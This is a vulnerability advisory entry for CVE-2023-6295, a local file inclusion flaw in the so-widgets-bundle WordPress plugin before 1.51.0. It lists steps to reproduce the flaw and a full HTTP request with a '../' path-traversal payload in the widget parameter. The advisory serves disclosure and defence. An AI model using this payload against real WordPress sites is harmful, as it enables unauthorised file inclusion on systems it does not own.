Lucene search
Sebastian NeefWPEX-ID:ADC9ED9F-55B4-43A9-A79D-C7120764F47CHistoryNov 27, 2023 - 12:00 a.m.
so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion
2023-11-2700:00:00
Sebastian Neef
40
wordpress
docker-containers
network-admin
so-widgets-bundle
local file inclusion
security defense
Description The plugin does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites.
1. Create a multi-site wordpress setup, i.e. using docker-containers, and setup a second "site" with a separate administrator (without super-admin/network-admin rights).
2. Install the so-widgets-bundle plugin and activate it for the network
3. Login as said new administrator to the separate site (here: "site2" at "/site2/").
4. Navigate to Plugins -> SiteOrigin Widgets
5. Intercept the request when clicking on "Activate" or "Deactivate" of any widget. The request should look like this and provide the nonce:
POST /site2/wp-admin/admin-ajax.php?action=so_widgets_bundle_manage&_wpnonce=f29efd46d6 HTTP/1.1
Host: localhost
Content-Length: 127
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: [cookie]
Connection: close
widget=../../../../../../../../../../../../../../../../../tmp/tmp&active=1Related
openvas
openvas
WordPress SiteOrigin Widgets Bundle Plugin < 1.51.0 LFI Vulnerability
2024-01-04 00:00:00
nvd
nvd
CVE-2023-6295
2023-12-18 20:15:09
cve
cve
CVE-2023-6295
2023-12-18 20:15:09
wpvulndb
wpvulndb
so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion
2023-11-27 00:00:00
cvelist
cvelist
CVE-2023-6295 so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion
2023-12-18 20:08:01
prion
prion
Design/Logic Flaw
2023-12-18 20:15:00
wordfence
wordfence
8.7 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
19.5%
Related for WPEX-ID:ADC9ED9F-55B4-43A9-A79D-C7120764F47C